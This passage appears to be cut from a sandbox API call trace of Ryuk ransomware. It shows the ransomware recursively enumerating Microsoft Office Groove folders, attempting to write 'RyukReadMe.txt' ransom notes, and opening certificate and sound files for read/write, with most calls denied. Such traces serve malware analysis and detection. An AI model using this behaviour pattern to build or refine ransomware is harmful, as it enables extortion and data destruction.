hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.789] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.789] SetLastError (dwErrCode=0x0) [0136.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.789] GetLastError () returned 0x5 [0136.789] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.789] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.789] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0136.790] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.790] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.790] SetLastError (dwErrCode=0x0) [0136.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.790] GetLastError () returned 0x5 [0136.790] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.790] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.791] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.791] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.791] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer", dwFileAttributes=0x80) returned 0 [0136.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\components\\signedcomponents.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.791] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.791] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.792] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.792] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.792] SetLastError (dwErrCode=0x0) [0136.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\components\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.792] GetLastError () returned 0x5 [0136.792] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.792] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.792] SetLastError (dwErrCode=0x0) [0136.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.792] GetLastError () returned 0x5 [0136.792] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.792] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.793] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.793] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.793] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.793] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\SignedManagedObjects.cer", dwFileAttributes=0x80) returned 0 [0136.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\SignedManagedObjects.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\managedobjects\\signedmanagedobjects.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.793] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.793] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.794] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.794] SetLastError (dwErrCode=0x0) [0136.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\managedobjects\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.794] GetLastError () returned 0x5 [0136.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.794] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.794] SetLastError (dwErrCode=0x0) [0136.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.794] GetLastError () returned 0x5 [0136.794] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.794] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.794] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.794] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.794] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.795] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer", dwFileAttributes=0x80) returned 0 [0136.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\management.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.795] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.795] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.795] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.795] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.795] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER", dwFileAttributes=0x80) returned 0 [0136.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\relay.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.796] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.796] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.796] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.796] SetLastError (dwErrCode=0x0) [0136.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.796] GetLastError () returned 0x5 [0136.796] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.796] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0136.796] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0136.796] SetLastError (dwErrCode=0x0) [0136.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.797] GetLastError () returned 0x5 [0136.797] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.797] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.797] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.797] SetLastError (dwErrCode=0x0) [0136.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.797] GetLastError () returned 0x5 [0136.797] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.797] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.797] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0136.798] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.798] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.798] SetLastError (dwErrCode=0x0) [0136.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.798] GetLastError () returned 0x5 [0136.798] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.798] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.798] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.799] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.799] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.799] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.799] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer", dwFileAttributes=0x80) returned 0 [0136.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_code_signing_2001-4_ca.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.800] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.800] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.800] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.800] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.800] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer", dwFileAttributes=0x80) returned 0 [0136.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_public_primary_ca.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.801] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.801] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.801] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.801] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer", dwFileAttributes=0x80) returned 0 [0136.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\vs_componentsigningintermediate.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.802] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.802] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.802] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.803] SetLastError (dwErrCode=0x0) [0136.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.805] GetLastError () returned 0x5 [0136.805] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.805] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0136.805] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0136.805] SetLastError (dwErrCode=0x0) [0136.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.806] GetLastError () returned 0x5 [0136.806] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.806] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.806] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.806] SetLastError (dwErrCode=0x0) [0136.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.806] GetLastError () returned 0x5 [0136.806] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.806] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.806] SetLastError (dwErrCode=0x0) [0136.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.806] GetLastError () returned 0x5 [0136.806] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.806] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.807] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.807] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.807] SetLastError (dwErrCode=0x0) [0136.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.807] GetLastError () returned 0x5 [0136.807] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0136.807] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.807] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0136.809] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.809] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.809] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.809] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\COUGH.WAV", dwFileAttributes=0x80) returned 0 [0136.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\COUGH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\cough.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.810] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.810] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.810] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.811] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\GIGGLE.WAV", dwFileAttributes=0x80) returned 0 [0136.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\GIGGLE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\giggle.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.811] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.811] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.811] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\HICCUP.WAV", dwFileAttributes=0x80) returned 0 [0136.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\HICCUP.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\hiccup.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.812] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.812] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.812] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\MMHMM.WAV", dwFileAttributes=0x80) returned 0 [0136.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\MMHMM.WAV" (normalized: "c:\\program files\\microsoft 